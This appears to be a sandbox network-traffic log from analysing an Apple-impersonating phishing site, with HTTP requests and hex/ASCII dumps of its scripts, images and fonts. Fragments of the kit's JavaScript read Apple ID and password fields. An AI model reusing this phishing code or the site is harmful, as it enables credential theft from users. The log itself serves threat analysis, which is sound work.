2025-01-13 00:49:39 UTC	375	OUT	GET /aU3V88/jss/myscript_ind_fact.js HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:39 UTC	238	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:39 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 4706 Content-Type: text/javascript
2025-01-13 00:49:39 UTC	4706	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 6c 69 6d 70 69 61 72 5f 63 61 72 67 61 28 29 20 7b 0a 20 20 20 20 24 28 22 23 63 61 72 67 61 5f 65 6e 76 69 6f 22 29 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 2c 20 22 6e 6f 6e 65 22 29 2c 20 24 28 22 23 62 74 5f 66 6c 65 63 22 29 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 2c 20 22 62 6c 6f 63 6b 22 29 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 73 75 62 6d 69 74 74 28 29 20 7b 0a 20 20 20 20 24 2e 74 72 69 6d 28 24 28 22 23 61 70 70 6c 65 49 64 22 29 2e 76 61 6c 28 29 2e 6c 65 6e 67 74 68 29 20 3e 20 30 20 3f 20 24 2e 74 72 69 6d 28 24 28 22 23 70 77 64 22 29 2e 76 61 6c 28 29 2e 6c 65 6e 67 74 68 29 20 3e 20 30 20 26 26 20 28 24 28 22 23 63 61 72 67 61 5f 65 6e 76 69 6f 22 29 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 2c 20 22 62 6c Data Ascii: function limpiar_carga() { $("#carga_envio").css("display", "none"), $("#bt_flec").css("display", "block")}function submitt() { $.trim($("#appleId").val().length) > 0 ? $.trim($("#pwd").val().length) > 0 && ($("#carga_envio").css("display", "bl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	53605	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:39 UTC	373	OUT	GET /aU3V88/images/ajax-loader.gif HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:39 UTC	232	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:39 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 3783 Content-Type: image/gif
2025-01-13 00:49:39 UTC	3783	IN	Data Raw: 47 49 46 38 39 61 20 00 20 00 f5 19 00 60 60 60 0c 0c 0c 00 00 00 e8 e8 e8 f0 f0 f0 d0 d0 d0 7e 7e 7e fa fa fa f6 f6 f6 e6 e6 e6 fc fc fc 92 92 92 86 86 86 e2 e2 e2 a0 a0 a0 3e 3e 3e c4 c4 c4 6c 6c 6c ee ee ee ec ec ec b8 b8 b8 56 56 56 9a 9a 9a ae ae ae 4a 4a 4a c8 c8 c8 dc dc dc d8 d8 d8 ce ce ce b0 b0 b0 1e 1e 1e 2c 2c 2c 4c 4c 4c 7c 7c 7c 5e 5e 5e a8 a8 a8 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 fe 1a 43 72 65 61 74 65 64 20 77 69 74 68 20 61 6a 61 78 6c 6f 61 64 2e 69 6e 66 6f 00 21 Data Ascii: GIF89a ```~~~>>>lllVVVJJJ,,,LLL\|\|\|^^^!NETSCAPE2.0!Created with ajaxload.info!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	53609	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:39 UTC	614	OUT	GET /aU3V88/css/myriad-set-pro_text.woff HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.flndmy.er-xu.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:40 UTC	164	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 00:49:39 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-13 00:49:40 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	53608	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:39 UTC	614	OUT	GET /aU3V88/css/myriad-set-pro_thin.woff HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.flndmy.er-xu.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:40 UTC	164	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 00:49:39 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-13 00:49:40 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	53607	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:39 UTC	382	OUT	GET /aU3V88/jss/myscript_patron.js?v=2gdssf HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:40 UTC	239	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:40 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 11635 Content-Type: text/javascript
2025-01-13 00:49:40 UTC	7953	IN	Data Raw: 20 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 63 6f 6e 74 65 78 74 6d 65 6e 75 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 7d 0a 20 20 0a 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 0a 0a 20 20 20 20 24 28 22 23 62 74 6e 5f 69 70 22 29 2e 63 73 73 28 22 74 6f 70 22 2c 22 35 70 78 22 29 3b 0a 0a 20 20 20 20 24 28 22 23 63 6f 6e 74 5f 62 74 6e 5f 61 70 70 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 70 5f 62 6f 72 22 29 3b 0a 20 20 20 20 24 28 22 23 63 6f 6e 74 5f 62 74 6e 5f 61 70 70 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22 62 6f 72 22 29 3b 0a 20 20 20 20 0a 20 20 20 20 24 28 22 23 63 6f 6e 74 5f 70 77 64 22 29 2e 61 64 64 43 6c 61 73 73 28 27 6e 6f 5f Data Ascii: document.oncontextmenu = function(){return false;} $(document).ready(function(){ $("#btn_ip").css("top","5px"); $("#cont_btn_apple").addClass("ap_bor"); $("#cont_btn_apple").addClass("bor"); $("#cont_pwd").addClass('no_
2025-01-13 00:49:40 UTC	3682	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 65 6c 73 65 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 67 69 74 6f 3d 64 69 67 69 74 6f 2b 27 2d 27 2b 24 28 74 68 69 73 29 2e 76 61 6c 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: }else{ digito=digito+'-'+$(this).val(); } } });

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	53626	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:42 UTC	613	OUT	GET /aU3V88/css/myriad-set-pro_thin.ttf HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.flndmy.er-xu.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:42 UTC	164	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 00:49:42 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-13 00:49:42 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	53627	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:42 UTC	613	OUT	GET /aU3V88/css/myriad-set-pro_text.ttf HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.flndmy.er-xu.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:43 UTC	164	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 00:49:43 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-13 00:49:43 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	53654	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:45 UTC	609	OUT	GET /favicon.ico HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.flndmy.er-xu.com/aU3V88/c1.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:45 UTC	164	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 00:49:45 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-13 00:49:45 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.6	53660	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:45 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 4a 77 38 55 58 4b 56 48 45 75 35 4a 6c 35 4f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 38 31 35 38 35 33 33 39 61 64 63 31 64 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 1Jw8UXKVHEu5Jl5O.1Context: b681585339adc1d0
2025-01-13 00:49:45 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-13 00:49:45 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 31 4a 77 38 55 58 4b 56 48 45 75 35 4a 6c 35 4f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 38 31 35 38 35 33 33 39 61 64 63 31 64 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 45 2b 7a 48 4d 6e 30 63 46 79 47 75 30 6f 35 62 69 7a 4b 42 31 78 37 65 49 50 45 79 49 55 72 4f 48 6a 2f 53 53 7a 71 78 30 4d 77 34 2b 7a 57 77 46 57 55 43 41 50 32 55 76 67 4d 31 55 4d 51 35 2f 4d 67 67 52 6f 78 77 72 74 57 4b 45 55 79 79 4e 6c 6a 6b 62 4f 4e 37 4f 4f 5a 47 4f 2b 4b 2f 58 2b 6a 34 39 4e 39 74 58 39 78 55 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 1Jw8UXKVHEu5Jl5O.2Context: b681585339adc1d0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARE+zHMn0cFyGu0o5bizKB1x7eIPEyIUrOHj/SSzqx0Mw4+zWwFWUCAP2UvgM1UMQ5/MggRoxwrtWKEUyyNljkbON7OOZGO+K/X+j49N9tX9xU
2025-01-13 00:49:45 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 31 4a 77 38 55 58 4b 56 48 45 75 35 4a 6c 35 4f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 38 31 35 38 35 33 33 39 61 64 63 31 64 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1Jw8UXKVHEu5Jl5O.3Context: b681585339adc1d0<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-13 00:49:45 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-13 00:49:45 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 43 32 36 55 65 6a 35 47 34 55 69 39 4b 39 38 63 61 39 41 69 72 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: C26Uej5G4Ui9K98ca9AirA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.6	53714	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:50:14 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 33 6c 58 64 76 6c 77 63 45 57 48 6d 31 67 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 39 38 66 31 66 30 33 38 36 66 64 64 39 33 34 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 73lXdvlwcEWHm1gx.1Context: c98f1f0386fdd934
2025-01-13 00:50:14 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
